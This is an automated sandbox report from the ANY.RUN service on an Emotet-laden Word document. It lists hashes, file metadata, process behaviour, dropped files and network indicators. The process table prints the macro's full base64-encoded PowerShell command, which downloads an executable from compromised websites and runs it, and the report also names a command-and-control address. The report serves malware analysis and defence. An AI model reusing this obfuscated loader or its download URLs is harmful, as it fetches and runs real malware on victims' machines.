analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Dok_96648461362_849661809737.doc

Full analysis: https://app.any.run/tasks/43df05b3-6fa7-4b64-8d76-76bca72e9212
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: September 19, 2019, 10:15:40
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: red connecting, Subject: Human, Author: Mike Effertz, Comments: National zero tolerance Intelligent Fresh Chips, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 19 07:46:00 2019, Last Saved Time/Date: Thu Sep 19 07:46:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:

843DC73E0488ACC78CED7B9AA4B3E643

SHA1:

87FF766C3BC585AE52F7DDFD189D557B7D353014

SHA256:

0DB51B17F0D92714FDD4A4622D20B084519761A539B211417CE790A47E7D3549

SSDEEP:

6144:zXtY2WaPaQxUk+MclQDgQO+PLkI27NSU4jJntATfD7TPsOuptq:zdY2WaPaQxUk+MclQDgQO8X27NSU4Vef

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 572.exe (PID: 2232)
      • 572.exe (PID: 2420)
      • 572.exe (PID: 3516)
      • 572.exe (PID: 3612)
      • easywindow.exe (PID: 2956)
      • easywindow.exe (PID: 3940)
      • easywindow.exe (PID: 2868)
      • easywindow.exe (PID: 3720)

    • Emotet process was detected

      • 572.exe (PID: 2420)

  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 2448)

    • Creates files in the user directory

      • powershell.exe (PID: 2448)

    • Executed via WMI

      • powershell.exe (PID: 2448)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2448)
      • 572.exe (PID: 2420)

    • Application launched itself

      • 572.exe (PID: 3612)
      • easywindow.exe (PID: 2868)

    • Starts itself from another location

      • 572.exe (PID: 2420)

    • Connects to server without host name

      • easywindow.exe (PID: 3720)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3524)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3524)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Greenholt
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 641
Paragraphs: 1
Lines: 4
Company: Lemke, Becker and Klocko
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 547
Words: 95
Pages: 1
ModifyDate: 2019:09:19 06:46:00
CreateDate: 2019:09:19 06:46:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: National zero tolerance Intelligent Fresh Chips
Keywords: -
Author: Mike Effertz
Subject: Human
Title: red connecting
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
10
Malicious processes
4
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 572.exe no specs 572.exe no specs 572.exe no specs #EMOTET 572.exe easywindow.exe no specs easywindow.exe no specs easywindow.exe no specs easywindow.exe

Process information

PID
CMD
Path
Indicators
Parent process
3524"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Dok_96648461362_849661809737.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2448powershell -encod JABwADgAMQBUAFkAagBJAEgAPQAnAHoAdQBQADUAUwBVADQAdQAnADsAJABrADQANwBwAHAATQA2AEkAIAA9ACAAJwA1ADcAMgAnADsAJABsADUAMABvAHIAagBZAD0AJwBkADEAaQA5AEUAUABqAEEAJwA7ACQASgBXAFQAcwBtAHMAcgBYAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABrADQANwBwAHAATQA2AEkAKwAnAC4AZQB4AGUAJwA7ACQAZABrAEsANAAyADkAPQAnAFQAVgBUAEsAagBGACcAOwAkAEsAbwBaAFoAOQBLADkAdgA9ACYAKAAnAG4AZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAHQALgB3AGUAYgBDAGwASQBFAE4AVAA7ACQASwBiAEwAagBPAEcAcgB6AD0AJwBoAHQAdABwAHMAOgAvAC8AYQBuAGkAdgBlAG4AdAB1AHIAZQAuAGMAbwAuAHUAawAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBhAGIAeQBPAHIARQBTAEQALwBAAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHMAdAByAHUAYwB0AHUAcgBlAHMALQBtAGEAZABlAC0AZQBhAHMAeQAuAGMAbwAuAHUAawAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEMAUABtAEIAVABtAHQATwAvAEAAaAB0AHQAcABzADoALwAvAG8AZgBmAHMAaQBkAGUAMgAuADAAMAAwAHcAZQBiAGgAbwBzAHQAYQBwAHAALgBjAG8AbQAvAHMAZQBrAGkAbABsAGUAcgAvAHgAQwBWAGwAUAB4AEgAWQAvAEAAaAB0AHQAcABzADoALwAvAHAAcgBhAG0AbwBkAGsAdQBtAGEAcgBzAGkAbgBnAGgALgAwADAAMAB3AGUAYgBoAG8AcwB0AGEAcABwAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAwAHAAagBxAF8AdQBvAGcAcQBqADUANwBoADEALQA1ADEAMQA4ADcAMAA0ADIAOQAwAC8AQABoAHQAdABwADoALwAvAGgAZQBhAGwAdABoAGsAbgBvAHcAbABlAGQAZwBlAC4AbQB5AC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AZwBpADcAagBlAGEAbwBsADQAbQBfADAAYwBrAGUAMQBxADAAeQAtADcANgAvACcALgAiAHMAYABwAEwAaQBUACIAKAAnAEAAJwApADsAJABDADMAcABzAEEAdgA9ACcAUwBLAFEAUgB6AEMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFcARABoAE0AaQA5AGEAIABpAG4AIAAkAEsAYgBMAGoATwBHAHIAegApAHsAdAByAHkAewAkAEsAbwBaAFoAOQBLADkAdgAuACIARABPAGAAdwBOAEwAbwBgAEEAYABkAEYASQBsAGUAIgAoACQAVwBEAGgATQBpADkAYQAsACAAJABKAFcAVABzAG0AcwByAFgAKQA7ACQAVwBkAFMAOQBqAEEASAByAD0AJwBBAGgAcgBZAFEAWQB3ACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQASgBXAFQAcwBtAHMAcgBYACkALgAiAEwAZQBgAE4AZwB0AGgAIgAgAC0AZwBlACAAMgAwADEAMQA0ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAEEAUgBUACIAKAAkAEoAVwBUAHMAbQBzAHIAWAApADsAJABSAG0ARwB6AFUAOABoAD0AJwBSAE4AVgBpAGEAdQBHAHcAJwA7AGIAcgBlAGEAawA7ACQAQwB2ADkAbwBqAHUAdAA9ACcAdQAzAGoAegAyAEoAaAAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGgAbQBpAGEAXwB0AFEAPQAnAE4AbwBLAGwAaABmAEoANQAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2232"C:\Users\admin\572.exe" C:\Users\admin\572.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3516"C:\Users\admin\572.exe" C:\Users\admin\572.exe572.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3612--fb4ffeeeC:\Users\admin\572.exe572.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2420--fb4ffeeeC:\Users\admin\572.exe
572.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3940"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exe572.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2868"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2956--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3720--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exe
easywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 762
Read events
1 271
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
10
Text files
0
Unknown types
43

Dropped files

PID
Process
Filename
Type
3524WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9A8F.tmp.cvr
MD5:
SHA256:
3524WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:62F2DA178DD59EBA6B61EE250E55F925
SHA256:8CF938206B83D51659082A32A71F3A9F077217F5A2E07A98541350C60245A244
3524WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:CD5FC43DB795E6983968748C0BD7A9B4
SHA256:8AE32EF60B1C82EF0AB3850ABD2D65DF2F7EEAF762AAEDC6DCFF9F5040EAB21A
3524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49B13251.wmfwmf
MD5:A04E082846CC22CB09BE6AAD470B7794
SHA256:9A976390FDCFECD248020C44881BFC6CC200772643AAEE8844D2149C01EE9547
3524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\64D03435.wmfwmf
MD5:05C986D43E41711FBF7121C053333EBC
SHA256:737E48615A83C201889E37B3C8376E8E68336098B4D6230057721DE298447375
3524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9A8642D.wmfwmf
MD5:77ACCAFF288173F58737F7B6B75171C6
SHA256:B766252B487B3AE3E9FA5F2DA5D4544A348B81F97BB33E18BFC9B4050E5A1DFA
3524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA9C464F.wmfwmf
MD5:B3CBFBEC5054C799F15968D7E66A4884
SHA256:CDC2F99DE574F1022F5B6D77289CE8E85ED4136118933C3C5C115C2790699BD3
3524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9CE0B987.wmfwmf
MD5:826DCDA5E9E5BB02E73B2A94D4562197
SHA256:0FD9208048B2E38F90178EF92F1FB359CBD6DE060550D276F758E3A430295C4C
3524WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$k_96648461362_849661809737.docpgc
MD5:CCDE3C3754A9D32C62569C95020704DD
SHA256:91E32B67E965146C5372AFD470F2F01E91F6DF76F208B0AC9C6BD7EBE47EA3A0
3524WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1E1CDD9.wmfwmf
MD5:5E5B8E20FDF075E6EA83EE6CDFD1F1D7
SHA256:288401AC26B243948AB5265DDF78D1FB030AEC457DC9DFB12B2FE076CE878C77
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
3
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3720
easywindow.exe
POST
190.18.146.70:80
http://190.18.146.70/raster/
AR
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3720
easywindow.exe
190.18.146.70:80
CABLEVISION S.A.
AR
malicious
2448
powershell.exe
104.28.19.13:443
aniventure.co.uk
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
aniventure.co.uk
  • 104.28.19.13
  • 104.28.18.13
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Dok_96648461362_849661809737.doc